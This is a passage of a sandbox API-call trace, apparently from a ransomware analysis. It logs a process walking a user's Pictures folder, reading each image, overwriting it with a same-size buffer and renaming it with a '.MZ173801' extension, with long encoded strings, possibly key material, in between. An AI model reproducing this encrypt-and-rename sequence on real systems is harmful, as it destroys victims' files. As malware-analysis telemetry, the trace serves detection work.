lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.707] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.707] GetCurrentThreadId () returned 0x1358 [0114.707] GetCurrentThreadId () returned 0x1358 [0114.707] GetCurrentThreadId () returned 0x1358 [0114.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QWOw3VER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qwow3ver.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.707] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.707] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.707] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x443a [0114.707] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.707] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x443a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x443a, lpOverlapped=0x0) returned 1 [0114.708] CloseHandle (hObject=0x3f8) returned 1 [0114.709] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\QWOw3VER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qwow3ver.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.710] WriteFile (in: hFile=0x3f8, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x443a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x443a, lpOverlapped=0x0) returned 1 [0114.711] CloseHandle (hObject=0x3f8) returned 1 [0114.713] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\QWOw3VER.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qwow3ver.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\QWOw3VER.gif.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\qwow3ver.gif.mz173801")) returned 1 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] GetCurrentThreadId () returned 0x1358 [0114.714] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3904540, ftCreationTime.dwHighDateTime=0x1d5ed2c, ftLastAccessTime.dwLowDateTime=0xf92b7900, ftLastAccessTime.dwHighDateTime=0x1d5ef22, ftLastWriteTime.dwLowDateTime=0xf92b7900, ftLastWriteTime.dwHighDateTime=0x1d5ef22, nFileSizeHigh=0x0, nFileSizeLow=0x9c94, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="rx3V.png", cAlternateFileName="")) returned 1 [0114.714] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.714] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.714] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\rx3V.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rx3v.png"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3904540, ftCreationTime.dwHighDateTime=0x1d5ed2c, ftLastAccessTime.dwLowDateTime=0xf92b7900, ftLastAccessTime.dwHighDateTime=0x1d5ef22, ftLastWriteTime.dwLowDateTime=0xf92b7900, ftLastWriteTime.dwHighDateTime=0x1d5ef22, nFileSizeHigh=0x0, nFileSizeLow=0x9c94)) returned 1 [0114.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.714] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.715] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.715] GetCurrentThreadId () returned 0x1358 [0114.716] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\rx3V.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rx3v.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.716] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.716] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.716] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x9c94 [0114.716] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.716] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9c94, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x9c94, lpOverlapped=0x0) returned 1 [0114.717] CloseHandle (hObject=0x3f8) returned 1 [0114.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\rx3V.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rx3v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.719] WriteFile (in: hFile=0x3f8, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9c94, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f9bc*=0x9c94, lpOverlapped=0x0) returned 1 [0114.720] CloseHandle (hObject=0x3f8) returned 1 [0114.721] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\rx3V.png" (normalized: "c:\\users\\fd1hvy\\pictures\\rx3v.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\rx3V.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\rx3v.png.mz173801")) returned 1 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] GetCurrentThreadId () returned 0x1358 [0114.722] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0114.722] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaac86010, ftCreationTime.dwHighDateTime=0x1d5e55f, ftLastAccessTime.dwLowDateTime=0x8c2a2480, ftLastAccessTime.dwHighDateTime=0x1d5e4c5, ftLastWriteTime.dwLowDateTime=0x8c2a2480, ftLastWriteTime.dwHighDateTime=0x1d5e4c5, nFileSizeHigh=0x0, nFileSizeLow=0x17f17, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="SFUO7aG.bmp", cAlternateFileName="")) returned 1 [0114.722] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.722] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.722] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\SFUO7aG.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\sfuo7ag.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaac86010, ftCreationTime.dwHighDateTime=0x1d5e55f, ftLastAccessTime.dwLowDateTime=0x8c2a2480, ftLastAccessTime.dwHighDateTime=0x1d5e4c5, ftLastWriteTime.dwLowDateTime=0x8c2a2480, ftLastWriteTime.dwHighDateTime=0x1d5e4c5, nFileSizeHigh=0x0, nFileSizeLow=0x17f17)) returned 1 [0114.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1